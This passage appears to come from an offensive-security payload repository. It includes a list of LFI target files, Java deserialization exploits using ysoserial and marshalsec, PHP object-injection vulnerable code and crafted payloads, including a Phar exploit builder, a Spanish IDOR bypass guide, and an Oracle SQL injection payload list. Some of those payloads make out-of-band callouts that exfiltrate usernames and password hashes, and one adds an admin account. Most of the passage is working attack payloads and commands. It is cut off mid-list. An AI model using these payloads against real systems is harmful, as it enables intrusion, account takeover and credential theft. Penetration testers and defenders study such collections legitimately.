c:/unattended.xml 196 | c:/windows/repair/sam 197 | c:/windows/repair/system 198 | ``` 199 | 200 | The following log files are controllable and can be included with an evil payload to achieve a command execution 201 | 202 | ```powershell 203 | /var/log/apache/access.log 204 | /var/log/apache/error.log 205 | /var/log/httpd/error_log 206 | /usr/local/apache/log/error_log 207 | /usr/local/apache2/log/error_log 208 | /var/log/nginx/access.log 209 | /var/log/nginx/error.log 210 | /var/log/vsftpd.log 211 | /var/log/sshd.log 212 | /var/log/mail 213 | ``` 214 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/JAVA.md: -------------------------------------------------------------------------------- 1 | # Java Deserialization 2 | 3 | ## Detection 4 | 5 | - "AC ED 00 05" in Hex 6 | - "rO0" in Base64 7 | - Content-type = "application/x-java-serialized-object" 8 | - "H4sIAAAAAAAAAJ" in gzip(base64) 9 | 10 | ## Exploit 11 | 12 | [ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. 13 | 14 | ```java 15 | java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin 16 | java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin 17 | java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin 18 | java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 19 | ``` 20 | 21 | payload | author | dependencies | impact (if not RCE) 22 | ------|--------|------ |------ 23 | BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5 24 | C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11 25 | Clojure |@JackOfMostTrades |clojure:1.8.0 26 | CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 27 | CommonsCollections1 |@frohoff |commons-collections:3.1 28 | CommonsCollections2 |@frohoff |commons-collections4:4.0 29 | CommonsCollections3 |@frohoff |commons-collections:3.1 30 | CommonsCollections4 |@frohoff |commons-collections4:4.0 31 | CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1 32 | CommonsCollections6 |@matthias_kaiser |commons-collections:3.1 33 | FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading 34 | Groovy1 |@frohoff |groovy:2.3.9 35 | Hibernate1 |@mbechler| 36 | Hibernate2 |@mbechler| 37 | JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 38 | JRMPClient |@mbechler| 39 | JRMPListener |@mbechler| 40 | JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 41 | JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 42 | Jdk7u21 |@frohoff| 43 | Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2 44 | MozillaRhino1 |@matthias_kaiser |js:1.7R2 45 | Myfaces1 |@mbechler| 46 | Myfaces2 |@mbechler| 47 | ROME |@mbechler |rome:1.0 48 | Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE 49 | Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 50 | URLDNS |@gebl| | jre only vuln detect 51 | Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4 52 | 53 | ## Burp extensions using ysoserial 54 | 55 | - [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) 56 | - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) 57 | - [Burp-ysoserial](https://github.com/summitt/burp-ysoserial) 58 | - [SuperSerial](https://github.com/DirectDefense/SuperSerial) 59 | - [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) 60 | 61 | ## Other tools 62 | 63 | - [JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) 64 | - [JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool 65 | - [ysoserial-modified](https://github.com/pimps/ysoserial-modified) 66 | - [gadgetprobe](https://labs.bishopfox.com/gadgetprobe) 67 | - [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution 68 | 69 | ```java 70 | java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 71 | 72 | where 73 | -a - generates/tests all payloads for that marshaller 74 | -t - runs in test mode, unmarshalling the generated payloads after generating them. 75 | -v - verbose mode, e.g. also shows the generated payload in test mode. 76 | gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. 77 | arguments - Gadget specific arguments 78 | ``` 79 | 80 | Payload generators for the following marshallers are included:<br /> 81 | 82 | | Marshaller | Gadget Impact 83 | | ------------------------------- | ---------------------------------------------- 84 | | BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization<br/>various third party libraries RCEs 85 | | Hessian|Burlap | various third party RCEs 86 | | Castor | dependency library RCE 87 | | Jackson | **possible JDK only RCE**, various third party RCEs 88 | | Java | yet another third party RCE 89 | | JsonIO | **JDK only RCE** 90 | | JYAML | **JDK only RCE** 91 | | Kryo | third party RCEs 92 | | KryoAltStrategy | **JDK only RCE** 93 | | Red5AMF(0|3) | **JDK only RCE** 94 | | SnakeYAML | **JDK only RCEs** 95 | | XStream | **JDK only RCEs** 96 | | YAMLBeans | third party RCE 97 | 98 | ## References 99 | 100 | - [Github - ysoserial](https://github.com/frohoff/ysoserial) 101 | - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) 102 | - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) 103 | - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 104 | - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) 105 | - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) 106 | - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) 107 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/PHP.md: -------------------------------------------------------------------------------- 1 | # PHP Object injection 2 | 3 | PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. 4 | 5 | The following magic methods will help you for a PHP Object injection 6 | 7 | * __wakeup() when an object is unserialized. 8 | * __destruct() when an object is deleted. 9 | * __toString() when an object is converted to a string. 10 | 11 | Also you should check the Wrapper `Phar://` like LFI which use a PHP object injection. 12 | 13 | ## Summary 14 | 15 | * [General concept](#general-concept) 16 | * [Authentication bypass](#authentication-bypass) 17 | * [Finding and using gadgets](#finding-and-using-gadgets) 18 | * [Real world examples](#real-world-examples) 19 | * [PHP Phar Deserialization](#php-phar-deserialization) 20 | * [References](#references) 21 | 22 | ## General concept 23 | 24 | Vulnerable code: 25 | 26 | ```php 27 | <?php 28 | class PHPObjectInjection{ 29 | public $inject; 30 | function __construct(){ 31 | } 32 | function __wakeup(){ 33 | if(isset($this->inject)){ 34 | eval($this->inject); 35 | } 36 | } 37 | } 38 | if(isset($_REQUEST['r'])){ 39 | $var1=unserialize($_REQUEST['r']); 40 | if(is_array($var1)){ 41 | echo "<br/>".$var1[0]." - ".$var1[1]; 42 | } 43 | } 44 | else{ 45 | echo ""; # nothing happens here 46 | } 47 | ?> 48 | ``` 49 | 50 | Craft a payload using existing code inside the application. 51 | 52 | ```php 53 | # Basic serialized data 54 | a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";} 55 | 56 | # Command execution 57 | string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" 58 | ``` 59 | 60 | ## Authentication bypass 61 | 62 | ### Type juggling 63 | 64 | Vulnerable code: 65 | 66 | ```php 67 | <?php 68 | $data = unserialize($_COOKIE['auth']); 69 | 70 | if ($data['username'] == $adminName && $data['password'] == $adminPassword) { 71 | $admin = true; 72 | } else { 73 | $admin = false; 74 | } 75 | ``` 76 | 77 | Payload: 78 | 79 | ```php 80 | a:2:{s:8:"username";b:1;s:8:"password";b:1;} 81 | ``` 82 | 83 | Because `true == "str"` is true. 84 | 85 | ### Object reference 86 | 87 | Vulnerable code: 88 | 89 | ```php 90 | <?php 91 | class Object 92 | { 93 | var $guess; 94 | var $secretCode; 95 | } 96 | 97 | $obj = unserialize($_GET['input']); 98 | 99 | if($obj) { 100 | $obj->secretCode = rand(500000,999999); 101 | if($obj->guess === $obj->secretCode) { 102 | echo "Win"; 103 | } 104 | } 105 | ?> 106 | ``` 107 | 108 | Payload: 109 | 110 | ```php 111 | O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} 112 | ``` 113 | 114 | We can do an array to like this: 115 | 116 | ```php 117 | a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} 118 | ``` 119 | 120 | ## Finding and using gadgets 121 | 122 | Also called "PHP POP Chains", they can be used to gain RCE on the system. 123 | 124 | [PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: 125 | 126 | - Laravel 127 | - Symfony 128 | - SwiftMailer 129 | - Monolog 130 | - SlimPHP 131 | - Doctrine 132 | - Guzzle 133 | 134 | ```powershell 135 | phpggc monolog/rce1 'phpinfo();' -s 136 | ``` 137 | 138 | ## PHP Phar Deserialization 139 | 140 | Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`. 141 | 142 | A valid PHAR includes four elements: 143 | 144 | 1. Stub 145 | 2. Manifest 146 | 3. File Contents 147 | 4. Signature 148 | 149 | Example of a Phar creation in order to exploit a custom `PDFGenerator`. 150 | 151 | ```php 152 | <?php 153 | class PDFGenerator { } 154 | 155 | //Create a new instance of the Dummy class and modify its property 156 | $dummy = new PDFGenerator(); 157 | $dummy->callback = "passthru"; 158 | $dummy->fileName = "uname -a > pwned"; //our payload 159 | 160 | // Delete any existing PHAR archive with that name 161 | @unlink("poc.phar"); 162 | 163 | // Create a new archive 164 | $poc = new Phar("poc.phar"); 165 | 166 | // Add all write operations to a buffer, without modifying the archive on disk 167 | $poc->startBuffering(); 168 | 169 | // Set the stub 170 | $poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();"); 171 | 172 | /* Add a new file in the archive with "text" as its content*/ 173 | $poc["file"] = "text"; 174 | // Add the dummy object to the metadata. This will be serialized 175 | $poc->setMetadata($dummy); 176 | // Stop buffering and write changes to disk 177 | $poc->stopBuffering(); 178 | ?> 179 | ``` 180 | 181 | 182 | ## Real world examples 183 | 184 | * [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237) 185 | * [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212) 186 | * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882) 187 | * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552) 188 | 189 | ## References 190 | 191 | * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) 192 | * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) 193 | * [PHP unserialize](http://php.net/manual/en/function.unserialize.php) 194 | * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) 195 | * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) 196 | * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) 197 | * [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/meepwn-2017-write-ups/#TSULOTT-Web) 198 | * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) 199 | * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) 200 | * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) 201 | * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/) 202 | * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/) 203 | -------------------------------------------------------------------------------- /Web Application/IDOR/README.md: -------------------------------------------------------------------------------- 1 | # IDOR 2 | 3 | Las referencias directas a objetos inseguras se producen cuando una aplicación proporciona acceso directo a objetos en función de la entrada proporcionada por el usuario. Como resultado de esta vulnerabilidad, los atacantes pueden eludir la autorización y acceder a los recursos del sistema directamente, por ejemplo, registros o archivos de bases de datos. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Exploit](#exploit) 9 | * [Lugares Poco Comunes](#lugares-poco-comunes) 10 | * [IDs Hasheados](#ids-hasheados) 11 | * [Adivinar IDs](#adivinar-ids) 12 | * [HPP con IDOR](#hpp-con-idor) 13 | * [Blind IDORs](#blind-idors) 14 | * [Cambiar el Método de la Request](#cambiar-el-metodo-de-la-request) 15 | * [Cambiar el Tipo de Archivo Solicitado](#cambiar-el-tipo-de-archivo-solicitado) 16 | * [Envolver ID en un Array](#envolver-id-en-un-array) 17 | * [Cómo Aumentar el Impacto de las IDOR](#como-aumentar-el-impacto-de-las-idors) 18 | * [Examples](#examples) 19 | 20 | 21 | 22 | ## Tools 23 | 24 | - Burp Suite plugin Authz 25 | - Burp Suite plugin AuthMatrix 26 | - Burp Suite plugin Authorize 27 | 28 | 29 | ## Exploit 30 | 31 | <img src="https://user-images.githubusercontent.com/43796175/115991665-326f6680-a58f-11eb-8b3a-117cf32d8710.png"></img> 32 | 33 | The value of a parameter is used directly to retrieve a database record. 34 | 35 | ```powershell 36 | http://foo.bar/somepage?invoice=12345 37 | ``` 38 | 39 | The value of a parameter is used directly to perform an operation in the system 40 | 41 | ```powershell 42 | http://foo.bar/changepassword?user=someuser 43 | ``` 44 | 45 | The value of a parameter is used directly to retrieve a file system resource 46 | 47 | ```powershell 48 | http://foo.bar/showImage?img=img00011 49 | ``` 50 | 51 | The value of a parameter is used directly to access application functionality 52 | 53 | ```powershell 54 | http://foo.bar/accessPage?menuitem=12 55 | ``` 56 | 57 | ## Lugares Poco Comunes 58 | 59 | No ignore los ID codificados y con hash. 60 | 61 | Cuando se enfrenta a un ID codificado, es posible decodificar el ID utilizando esquemas de codificación comunes. 62 | 63 | Y si la aplicación utiliza una identificación hash aleatoria, vea si la identificación es predecible. 64 | 65 | A veces, las aplicaciones utilizan algoritmos que producen una entropía insuficiente y, como tal, los ID se pueden predecir después de un análisis cuidadoso. 66 | 67 | En este caso, intente crear algunas cuentas para analizar cómo se crean estos ID. Es posible que pueda encontrar un patrón que le permita predecir las ID que pertenecen a otros usuarios. 68 | 69 | Si los ID de referencia de objeto parecen impredecibles, vea si hay algo que pueda hacer para manipular el proceso de creación o vinculación de estos ID de objeto. 70 | 71 | ## IDs Hasheados 72 | 73 | No siempre es tan fácil como cambiar su `ID` de usuario por otro `ID`, a veces es no puede adivinar el `ID` asociado, como se muestra a continuación: 74 | ``` 75 | POST /challenge/users/vfd3f0jkui4555kJNJHahh023 76 | Host: vulnerable.com 77 | 78 | userID=8f14e45fceea167a5a36dedd4bea2543 79 | ``` 80 | 81 | Observando el ID del user `8f14e45fceea167a5a36dedd4bea2543`, podría pensar que es una identificación aleatoria que es imposible adivinar, pero puede que no sea el caso. 82 | 83 | Es una práctica común [HASHEAR](https://www.md5online.org/md5-decrypt.html) el `ID` de los usarios antes de almacenarlos en una base de datos, así que tal vez eso sea lo que está sucediendo aquí: 84 | 85 | <img src="https://user-images.githubusercontent.com/43796175/122650815-85324e00-d0fa-11eb-89d8-b7d63db9120a.jpg"> 86 | 87 | Luego, hashee los números correspondientes para obtener su IDOR. 88 | 89 | ## Adivinar IDs 90 | 91 | Si no se utilizan ID en la solicitud generada por la aplicación, intente agregarlo a la solicitud. Intente agregar `id`, `user_id`, `message_id` u otros parámetros de referencia de objeto y vea si hace una diferencia en el comportamiento de la aplicación. 92 | 93 | Por ejemplo, si esta solicitud muestra todos sus mensajes directos: 94 | 95 | ``` 96 | GET /api_v1/messages 97 | ``` 98 | 99 | Entonces, ¿esta request mostraría los mensajes de otro usuario? 100 | 101 | ``` 102 | GET /api_v1/messages?user_id=ANOTHER_USERS_ID 103 | ``` 104 | 105 | ## HPP con IDOR 106 | 107 | Las vulnerabilidades de HPP (que proporcionan múltiples valores para el mismo parámetro) también pueden conducir a IDOR. 108 | 109 | Es posible que las aplicaciones no anticipen que el usuario envíe varios valores para el mismo parámetro y, al hacerlo, puede bypassear el control de acceso establecido en el endpoint. 110 | 111 | Se vería así. Si esta solicitud falla: 112 | 113 | ``` 114 | GET /api_v1/messages?user_id=[ANOTHER_USERS_ID] 115 | ``` 116 | 117 | Prueba esto: 118 | 119 | ``` 120 | GET /api_v1/messages?user_id=[YOUR_USER_ID]&user_id=[ANOTHER_USERS_ID] 121 | ``` 122 | 123 | O esto: 124 | 125 | ``` 126 | GET /api_v1/messages?user_id=[ANOTHER_USERS_ID]&user_id=[YOUR_USER_ID] 127 | ``` 128 | 129 | O proporcione los parámetros como una lista: 130 | 131 | ``` 132 | GET /api_v1/messages?user_ids[]=[YOUR_USER_ID]&user_ids[]=[ANOTHER_USERS_ID] 133 | ``` 134 | 135 | ## Blind IDOR 136 | 137 | A veces, los endpoints susceptibles a IDOR no responden directamente con la información filtrada. En su lugar, podrían llevar a la aplicación a filtrar información en otro lugar: en archivos de exportación, correos electrónicos y tal vez incluso alertas de texto. 138 | 139 | ## Cambiar el Método de la Request 140 | 141 | Si un método de solicitud no funciona, hay muchos otros que puede probar en su lugar: GET, POST, PUT, DELETE, PATCH ... 142 | 143 | Un truco común que funciona es sustituir POST por PUT o viceversa: 144 | ¡es posible que no se hayan implementado los mismos controles de acceso! 145 | 146 | ## Cambiar el Tipo de Archivo Solicitado 147 | 148 | A veces, cambiar el tipo de archivo del fichero solicitado puede llevar a que el servidor procese la autorización de manera diferente. Por ejemplo, intente agregar `.json` al final de la URL de solicitud y vea qué sucede. 149 | 150 | ## Envolver ID en un Array 151 | 152 | ``` 153 | {“id”:111} --> 401 Unauthriozied 154 | {“id”:[111]} --> 200 OK 155 | ``` 156 | 157 | ``` 158 | {“id”:111} --> 401 Unauthriozied 159 | {“id”:{“id”:111}} --> 200 OK 160 | ``` 161 | 162 | ## Cómo Aumentar el Impacto de las IDOR 163 | 164 | ### IDOR Críticas Primero 165 | 166 | Siempre busque IDOR en funcionalidades críticas primero. 167 | 168 | Los IDOR basados en lectura y escritura pueden tener un gran impacto. 169 | 170 | En términos de IDOR de cambio de estado (escritura), restablecimiento de contraseña, cambio de contraseña, IDOR de recuperación de cuenta a menudo tienen el mayor impacto comercial. (Digamos, en comparación con un IDOR de "cambiar la configuración de suscripción de correo electrónico"). 171 | 172 | En cuanto a los IDOR que no cambian de estado (lectura), busque funcionalidades que manejen la información confidencial en la aplicación. 173 | 174 | Por ejemplo, busque funcionalidades que manejen mensajes directos, información confidencial del usuario y contenido privado. Considere qué funcionalidades de la aplicación utilizan esta información y busque los IDOR en consecuencia. 175 | 176 | 177 | ## Examples 178 | 179 | * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) 180 | * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) 181 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Oracle_All.txt: -------------------------------------------------------------------------------- 1 | ' BEGIN DBMS_LOCK.SLEEP(15); END; 2 | ’ or ‘1’=’1 3 | ' or '1'='1 4 | '||utl_http.request('httP://192.168.1.1/')||' 5 | ' || myappadmin.adduser('admin', 'newpass') || ' 6 | ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i 7 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i 8 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i 9 | ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i 10 | ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i 11 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i 12 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i 13 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i 14 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i 15 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i 16 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i 17 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i 18 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i 19 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i 20 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i 21 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i 22 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i 23 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i 24 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i 25 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i 26 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i 27 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i 28 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i 29 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i 30 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i 31 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i 32 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i 33 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i 34 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i 35 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i 36 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i 37 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i 38 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i 39 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i 40 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i 41 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i 42 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i 43 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i 44 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i 45 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i 46 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i 47 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) 